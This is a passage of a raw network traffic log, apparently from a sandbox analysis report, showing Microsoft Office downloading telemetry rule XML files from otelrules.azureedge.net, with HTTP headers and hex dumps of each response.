                                                  2024-10-31 19:50:49 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  90192.168.2.45240313.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:48 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:49 UTC584INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:48 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 2592
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                  ETag: "0x8DC582BB5B890DB"
                                                  x-ms-request-id: 335320d3-001e-000b-4596-2a15a7000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195048Z-16849878b78bcpfn2qf7sm6hsn0000000bf00000000131b8
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:49 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  91192.168.2.45240413.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:49 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:49 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:49 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 3342
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                  ETag: "0x8DC582B927E47E9"
                                                  x-ms-request-id: 41937e91-c01e-008e-5d57-277381000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195049Z-16849878b7867ttgfbpnfxt44s00000009s000000000y308
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:49 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  92192.168.2.45240513.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:49 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:49 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:49 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 2284
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                  ETag: "0x8DC582BCD58BEEE"
                                                  x-ms-request-id: 69a14025-c01e-000b-6685-2ae255000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195049Z-17c5cb586f62bgw58esgbu9hgw00000002p000000000dgqh
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:49 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  93192.168.2.45240613.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:49 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:49 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:49 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1393
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                  ETag: "0x8DC582BE3E55B6E"
                                                  x-ms-request-id: 97090380-701e-0032-52b4-2aa540000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195049Z-16849878b78nzcqcd7bed2fb6n00000002a000000000ygse
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:49 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  94192.168.2.45240713.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:49 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:49 UTC584INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:49 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1356
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                  ETag: "0x8DC582BDC681E17"
                                                  x-ms-request-id: 19a18c92-701e-0098-0fb0-26395f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195049Z-16849878b782d4lwcu6h6gmxnw00000009p000000000gfgp
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:49 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  95192.168.2.45240813.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:49 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:49 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:49 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1393
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                  ETag: "0x8DC582BE39DFC9B"
                                                  x-ms-request-id: 0243abe0-001e-0028-29fb-25c49f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195049Z-16849878b786lft2mu9uftf3y40000000b5g00000000t0a0
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:49 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  96192.168.2.45240913.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:50 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:50 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:50 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1356
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                  ETag: "0x8DC582BDF66E42D"
                                                  x-ms-request-id: 2e99a458-901e-0067-29ae-26b5cb000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195050Z-15b8d89586ffsjj9qb0gmb1stn0000000e3000000000ntx3
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:50 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  97192.168.2.45241013.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:50 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:50 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:50 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1395
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                  ETag: "0x8DC582BE017CAD3"
                                                  x-ms-request-id: cd04a713-f01e-003f-7315-26d19d000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195050Z-16849878b78fkwcjkpn19c5dsn00000008xg00000000uer2
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:50 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  98192.168.2.45241213.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:50 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:50 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:50 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1395
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                  ETag: "0x8DC582BDE12A98D"
                                                  x-ms-request-id: eb17c832-b01e-0097-1249-274f33000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195050Z-16849878b78qfbkc5yywmsbg0c00000009ng00000000hhx1
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:50 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  99192.168.2.45241313.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:50 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:50 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:50 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1358
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                  ETag: "0x8DC582BE022ECC5"
                                                  x-ms-request-id: 255ed8c5-301e-0051-461c-2738bb000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195050Z-15b8d89586ffsjj9qb0gmb1stn0000000e80000000005dqr
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:50 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  100192.168.2.45241113.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:50 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
